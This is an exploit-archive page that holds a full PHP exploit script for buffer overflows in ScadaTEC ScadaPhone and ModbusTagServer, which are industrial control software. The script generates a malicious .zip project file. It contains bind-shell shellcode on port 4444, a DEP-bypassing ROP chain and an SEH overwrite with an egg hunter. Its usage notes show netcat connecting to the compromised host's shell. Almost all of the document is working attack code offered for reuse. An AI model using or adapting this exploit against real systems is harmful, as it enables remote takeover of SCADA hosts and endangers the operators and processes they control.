Home / exploits ScadaTEC ModbusTagServer / ScadaPhone Buffer Overflow
Posted on 12 September 2011
<?php /* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ScadaTEC ModbusTagServer & ScadaPhone (.zip) buffer overflow exploit (0day) Date: 09/09/2011 Author: mr_me (@net__ninja) Vendor: http://www.scadatec.com/ ScadaPhone Version: <= 5.3.11.1230 ModbusTagServer Version: <= 4.1.1.81 Tested on: Windows XP SP3 NX=AlwaysOn/OptIn ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Notes: - The ScadaPhone exploit is a DEP bypass under windows XP sp3 only - The ModbusTagServer exploit does not bypass dep - To trigger this vulnerability, you must 'load' a project from a zip file. Feel free to improve it if you want. Example usage: [mr_me@neptune scadatec]$ php zip.php -t scadaphone [mr_me@neptune scadatec]$ nc -v 192.168.114.141 4444 Connection to 192.168.114.141 4444 port [tcp/krb524] succeeded! Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:ScadaTECScadaPhoneProjects> [mr_me@neptune scadatec]$ php zip.php -t modbustagserver [mr_me@neptune scadatec]$ nc -v 192.168.114.141 4444 Connection to 192.168.114.141 4444 port [tcp/krb524] succeeded! Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:ScadaTECModbusTagServerProjects> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 'The reason they call it the American Dream is because you have to be asleep to believe it.' ~ George Carlin */ if ($argc < 3) { print_r(" ----------------------------------------------------------------------------- Usage: php ".$argv[0]." -t <software> software: target software Example: php ".$argv[0]." -t scadaphone php ".$argv[0]." -t modbustagserver ----------------------------------------------------------------------------- "); die; } function setArgs($argv){ $_ARG = array(); foreach ($argv as $arg){ if (ereg("--([^=]+)=(.*)", $arg, $reg)){ $_ARG[$reg[1]] = $reg[2]; }elseif(ereg("^-([a-zA-Z0-9])", $arg, $reg)){ $_ARG[$reg[1]] = "true"; }else { $_ARG["input"][] = $arg; } } return $_ARG; } $myArgs = setArgs($argv); $target = $myArgs["input"]["1"]; $lf_header = "x50x4bx03x04x14x00x00x00x00x00xb7xacxcex34x00x00x00". "x00x00x00x00x00x00x00x00xe4x0fx00x00x00"; $cdf_header = "x50x4bx01x02x14x00x14x00x00x00x00x00xb7xacxcex34x00x00x00". "x00x00x00x00x00x00x00x00x00xe4x0fx00x00x00x00x00x00x01x00". "x24x00x00x00x00x00x00x00"; $efcdr_record = "x50x4bx05x06x00x00x00x00x01x00x01x00". "x12x10x00x00x02x10x00x00x00x00"; $___offset = 4064; // bind shell on port 4444 $___sc = "x90x90x90x90". "xd9xc7xb8x94x32x09x43xd9x74x24xf4x5bx31xc9xb1". "x56x31x43x18x83xebxfcx03x43x80xd0xfcxbfx40x9d". "xffx3fx90xfex76xdaxa1x2cxecxaex93xe0x66xe2x1f". "x8ax2bx17x94xfexe3x18x1dxb4xd5x17x9ex78xdaxf4". "x5cx1axa6x06xb0xfcx97xc8xc5xfdxd0x35x25xafx89". "x32x97x40xbdx07x2bx60x11x0cx13x1ax14xd3xe7x90". "x17x04x57xaex50xbcxdcxe8x40xbdx31xebxbdxf4x3e". "xd8x36x07x96x10xb6x39xd6xffx89xf5xdbxfexcex32". "x03x75x25x41xbex8exfex3bx64x1axe3x9cxefxbcxc7". "x1dx3cx5ax83x12x89x28xcbx36x0cxfcx67x42x85x03". "xa8xc2xddx27x6cx8ex86x46x35x6ax69x76x25xd2xd6". "xd2x2dxf1x03x64x6cx9exe0x5bx8fx5ex6exebxfcx6c". "x31x47x6bxddxbax41x6cx22x91x36xe2xddx19x47x2a". "x1ax4dx17x44x8bxedxfcx94x34x38x52xc5x9ax92x13". "xb5x5ax42xfcxdfx54xbdx1cxe0xbexc8x1ax2ex9ax99". "xccx53x1cx0cx51xddxfax44x79x8bx55xf0xbbxe8x6d". "x67xc3xdaxc1x30x53x52x0cx86x5cx63x1axa5xf1xcb". "xcdx3dx1axc8xecx42x37x78x66x7bxd0xf2x16xcex40". "x02x33xb8xe1x91xd8x38x6fx8ax76x6fx38x7cx8fxe5". "xd4x27x39x1bx25xb1x02x9fxf2x02x8cx1ex76x3exaa". "x30x4exbfxf6x64x1ex96xa0xd2xd8x40x03x8cxb2x3f". "xcdx58x42x0cxcex1ex4bx59xb8xfexfax34xfdx01x32". "xd1x09x7ax2ex41xf5x51xeax71xbcxfbx5bx1ax19x6e". "xdex47x9ax45x1dx7ex19x6fxdex85x01x1axdbxc2x85". "xf7x91x5bx60xf7x06x5bxa1"; if(strcmp($target,"scadaphone") === 0){ // add esp 418; retn $___pivot = "x0bx33xc6x01"; $___jmp = "xebx06HI"; $___rop = ""; $___rop .= "x1cx05x03x10". // xor edx,edx; retn "xa2xcex02x10". // pop eax; retn "xf4x11x6ex6d". // &VirtualProtect "xa9x4ex01x10". // mov eax,[eax]; retn "xd7xbfx01x10". // push eax; mov eax,[edx*4+10036948]; and eax,esi; pop esi; pop ebx; retn "xc0xffxffxff". // special sauce ----------------------------------------------^^ "x1exe0x02x10". // add edx,ebx; pop ebx; retn 10 "LOLZ". // junk "xeax37xc6x01". // neg edx; neg eax; sbb edx,0; pop ebx; retn 10 "CAFEBABE". // junk "CAFEBABE". // junk "xbfx52xc6x01". // .data writable ------------------^^ "xa2xcex02x10". // pop eax; retn "CAFEBABE". // junk "CAFEBABE". // junk "x17x32xc6x01". // ptr to 0x400 "xa9x4ex01x10". // mov eax,[eax]; retn "xe4x85x02x10". // xchg eax,ebx; add dl,[eax]; mov [eax+8],11; mov eax,13; retn "xa2xcex02x10". // pop eax; retn "x90x90x90x90". // nops "x53x54x10x10". // pop edi; retn "x54x54x10x10". // retn "x01xecx02x10". // pop ecx; retn "xc0x52xc6x01". // .data writable "x03xc0x17x10". // pop ebp; retn "x44xcbx2bx10". // ptr to 'push esp; ret' "xb7xc9x27x10"; // pushad; retn $___exploit = str_repeat("x41",57). $___rop; $___exploit .= str_repeat("x90",277-strlen($___exploit)). $___jmp. $___pivot. $___sc; $___exploit .= str_repeat("x41",$___offset-strlen($___exploit))."x1ex74x78x74"; }else if(strcmp($target,"modbustagserver") === 0) { $__hunter = "x66x81xcAxffx0fx42x52x6a". "x02x58xcdx2ex3cx05x5ax74xefxb8". "OMFG". "x8bxfaxafx75xeAxafx75xe7xffxe7"; $___nseh = "xebxceHI"; // pop esi; pop ebx; retn $___seh = "xacx14x40x00"; $___exploit = str_repeat("x41",229). $__hunter. str_repeat("x44",48-strlen($__hunter)). $___nseh. $___seh. str_repeat("x44",100). "OMFGOMFG". $___sc; $___exploit .= str_repeat("x41",$___offset-strlen($___exploit))."x1ex74x78x74"; }else{ exit(0); } $_____boom = $lf_header.$___exploit.$cdf_header.$___exploit.$efcdr_record; file_put_contents("scadatec.zip",$_____boom); ?>
